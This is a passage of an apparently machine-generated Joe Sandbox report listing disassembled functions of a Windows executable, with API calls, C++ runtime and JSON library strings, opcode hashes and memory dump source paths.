                                                                                                                                                                  • Instruction Fuzzy Hash: A3310721B1AA8292EE51FB12AC005B4A398FF65BB0FE90534DD9D0B755EF3CF4448B24
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                  • String ID: CONOUT$
                                                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2081738530-0
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF72CA0167D,?,?,?,?,00007FF72CA0A1B8,?,?,?,00007FF72C9F47BB), ref: 00007FF72CA0710B
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72CA0167D,?,?,?,?,00007FF72CA0A1B8,?,?,?,00007FF72C9F47BB), ref: 00007FF72CA07141
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72CA0167D,?,?,?,?,00007FF72CA0A1B8,?,?,?,00007FF72C9F47BB), ref: 00007FF72CA0716E
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72CA0167D,?,?,?,?,00007FF72CA0A1B8,?,?,?,00007FF72C9F47BB), ref: 00007FF72CA0717F
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72CA0167D,?,?,?,?,00007FF72CA0A1B8,?,?,?,00007FF72C9F47BB), ref: 00007FF72CA07190
                                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,00007FF72CA0167D,?,?,?,?,00007FF72CA0A1B8,?,?,?,00007FF72C9F47BB), ref: 00007FF72CA071AB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 2718003287-578493202
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
                                                                                                                                                                  • String ID: *L\(&.$assert json failed$in Json::Value::setComment(): Comments must start with /
                                                                                                                                                                  • API String ID: 1944019136-534947926
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                  • API String ID: 3668304517-1877168627
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                  • API String ID: 2967684691-1405518554
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 2933794660-578493202
                                                                                                                                                                  • Opcode ID: f0ffd342919842dffd779aa7ca47588310b5acaa36f8272d6a3067b3f271bd00
                                                                                                                                                                  • Instruction ID: 0c013ffe891629af4c54ae2c66da7a52f15dbe6d8817449ac7547d1f82b54a92
                                                                                                                                                                  • Opcode Fuzzy Hash: f0ffd342919842dffd779aa7ca47588310b5acaa36f8272d6a3067b3f271bd00
                                                                                                                                                                  • Instruction Fuzzy Hash: F6114F32B14B018AEB00DB60EC556A873B4F769768F440E31EA6D46764DF78D1548750
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                  • Opcode ID: 2302ca60823f266ee403192b38d82632f3600e312b6eaa9bdd1a18a282298c45
                                                                                                                                                                  • Instruction ID: 9d04066f94fbdb546c7c55b3994fef54efc3aa20971f3c356c48493ae0fb2d2f
                                                                                                                                                                  • Opcode Fuzzy Hash: 2302ca60823f266ee403192b38d82632f3600e312b6eaa9bdd1a18a282298c45
                                                                                                                                                                  • Instruction Fuzzy Hash: 7AF0C83160975242EA50AB10FC457399335FF65B70FD40235C66D455F8DF2CD048CB60
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AdjustPointer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1740715915-0
                                                                                                                                                                  • Opcode ID: f326ad5175e3b62aa93a89792347835425af060cf54c4b9b7bd193f230058973
                                                                                                                                                                  • Instruction ID: 49065a33d5adfa134380970def462e345cb7918d3c4330b437f1742ec4ad5c5c
                                                                                                                                                                  • Opcode Fuzzy Hash: f326ad5175e3b62aa93a89792347835425af060cf54c4b9b7bd193f230058973
                                                                                                                                                                  • Instruction Fuzzy Hash: 17B10521E0E68681EA75FB159C40678E398EF64BA0F898535DECD07789DF7CE442CB60
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _set_statfp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1156100317-0
                                                                                                                                                                  • Opcode ID: cd52082943f980d58492013c26f8fb82f062a7bb36eec0fc851e741c7c142c53
                                                                                                                                                                  • Instruction ID: a123f77a1143be8ba913291f91c7f124f5dcff57730a012d34b64179acdcdcb2
                                                                                                                                                                  • Opcode Fuzzy Hash: cd52082943f980d58492013c26f8fb82f062a7bb36eec0fc851e741c7c142c53
                                                                                                                                                                  • Instruction Fuzzy Hash: 83116322E6CE9701F65431B8FC53B75D460EFB93F4EC50734E6EE162D68E6C5840AA20
                                                                                                                                                                  APIs
                                                                                                                                                                  • FlsGetValue.KERNEL32(?,?,?,00007FF72C9FC9D3,?,?,00000000,00007FF72C9FCC6E,?,?,?,?,?,00007FF72C9FCBFA), ref: 00007FF72CA071E3
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C9FC9D3,?,?,00000000,00007FF72C9FCC6E,?,?,?,?,?,00007FF72C9FCBFA), ref: 00007FF72CA07202
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C9FC9D3,?,?,00000000,00007FF72C9FCC6E,?,?,?,?,?,00007FF72C9FCBFA), ref: 00007FF72CA0722A
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C9FC9D3,?,?,00000000,00007FF72C9FCC6E,?,?,?,?,?,00007FF72C9FCBFA), ref: 00007FF72CA0723B
                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00007FF72C9FC9D3,?,?,00000000,00007FF72C9FCC6E,?,?,?,?,?,00007FF72C9FCBFA), ref: 00007FF72CA0724C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                  • Opcode ID: 1663a44eae8f82a26d11b9e12c7d48bc313854e6dd7bdf1d345b4e7f37362408
                                                                                                                                                                  • Instruction ID: 195a48cd1b6756ee939eb392e9e68681cfcd8980ee7896b025447a128bc3e7f4
                                                                                                                                                                  • Opcode Fuzzy Hash: 1663a44eae8f82a26d11b9e12c7d48bc313854e6dd7bdf1d345b4e7f37362408
                                                                                                                                                                  • Instruction Fuzzy Hash: 78115E20E0D64242FA98B331BD51B399162DF74BF0FC45334E83D4A7D6DE3CA4418A24
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                  • Opcode ID: dc8ea1d9519b54fa4a9724d128b0dab74a31c9f666ccf91e0b1130d4ce44c25a
                                                                                                                                                                  • Instruction ID: 81a348c7f1d7e9080dbfcb8478a78a833ac72e5bab10dfd4125968e94cac26d9
                                                                                                                                                                  • Opcode Fuzzy Hash: dc8ea1d9519b54fa4a9724d128b0dab74a31c9f666ccf91e0b1130d4ce44c25a
                                                                                                                                                                  • Instruction Fuzzy Hash: B611D610E0924342F998BB35BC61B799162CF74BB0F941734E93E4A6D6DE3DB8418A39
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3668304517-3916222277
                                                                                                                                                                  • Opcode ID: 5f376059e06d9fe9c7a00089e6956f19652ed4f00f2701aae3a7620824b6b20a
                                                                                                                                                                  • Instruction ID: 8b532fbd26df02e108c833b324d5787d77cc38634ebac13184c68eee71b64650
                                                                                                                                                                  • Opcode Fuzzy Hash: 5f376059e06d9fe9c7a00089e6956f19652ed4f00f2701aae3a7620824b6b20a
                                                                                                                                                                  • Instruction Fuzzy Hash: C4D1B462E08A8280EB10FB65DC442ADA361FB25BE8F945137DD9D1769ADF38D881C760
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF72C9E6B70: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF72C9E6B9B
                                                                                                                                                                    • Part of subcall function 00007FF72C9E6B70: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF72C9E6BC0
                                                                                                                                                                    • Part of subcall function 00007FF72C9E6B70: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF72C9E6BEA
                                                                                                                                                                    • Part of subcall function 00007FF72C9E6B70: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF72C9E6C7B
                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72C9E47B5
                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72C9E47BB
                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72C9E47C1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Lockitstd::_$_invalid_parameter_noinfo_noreturn$Lockit::_Lockit::~_
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 3916664010-578493202
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                  • API String ID: 3215553584-1196891531
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                  • API String ID: 3215553584-1196891531
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 3936042273-578493202
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                  • String ID: csm
                                                                                                                                                                  • API String ID: 2395640692-1018135373
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                  • String ID: csm$csm
                                                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: $*L\(&.$in Json::Value::getMemberNames(), value must be objectValue
                                                                                                                                                                  • API String ID: 3668304517-1700038481
                                                                                                                                                                  • Opcode ID: fcad06121cb427b66d7428271699ca92353f82652a11d40ff8b1f23b940c495e
                                                                                                                                                                  • Instruction ID: fba72473c4001d8062dc1b7a131c856a34b5d05ec756d028b92926add25ab8d1
                                                                                                                                                                  • Opcode Fuzzy Hash: fcad06121cb427b66d7428271699ca92353f82652a11d40ff8b1f23b940c495e
                                                                                                                                                                  • Instruction Fuzzy Hash: A051987291CBC581E610EB15E8401ADE365FBA5BE4F905232E6DC43AA9DF7CE490CB10
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                  • API String ID: 2775327233-1405518554
                                                                                                                                                                  • Opcode ID: 040af10b6157e872dfc835baa0e15c3b9ec61df41762fbcce16fc13e722726e6
                                                                                                                                                                  • Instruction ID: f4e6fb761961f0bc7b0123ebbc6980a60d9d2c78708122a7e673b35116921f92
                                                                                                                                                                  • Opcode Fuzzy Hash: 040af10b6157e872dfc835baa0e15c3b9ec61df41762fbcce16fc13e722726e6
                                                                                                                                                                  • Instruction Fuzzy Hash: 6241BF22B0AA81C9FB20EF71E8912BC7364EF64718F884035DF8D26A55CE39D552D724
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                  • API String ID: 2775327233-1405518554
                                                                                                                                                                  • Opcode ID: f491357505a8c0e4502c81c68992ba5428a7d1f52ffd2568fec13d9d83c12e45
                                                                                                                                                                  • Instruction ID: fbcf12c21bcef215dad660a9ddf083b2e3c420a45ab8048d59dead046ff30801
                                                                                                                                                                  • Opcode Fuzzy Hash: f491357505a8c0e4502c81c68992ba5428a7d1f52ffd2568fec13d9d83c12e45
                                                                                                                                                                  • Instruction Fuzzy Hash: F7418F22B0AA81C9EB20EF70D8503FC7364EF64718F884435DA8D26A59CE38D512D765
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
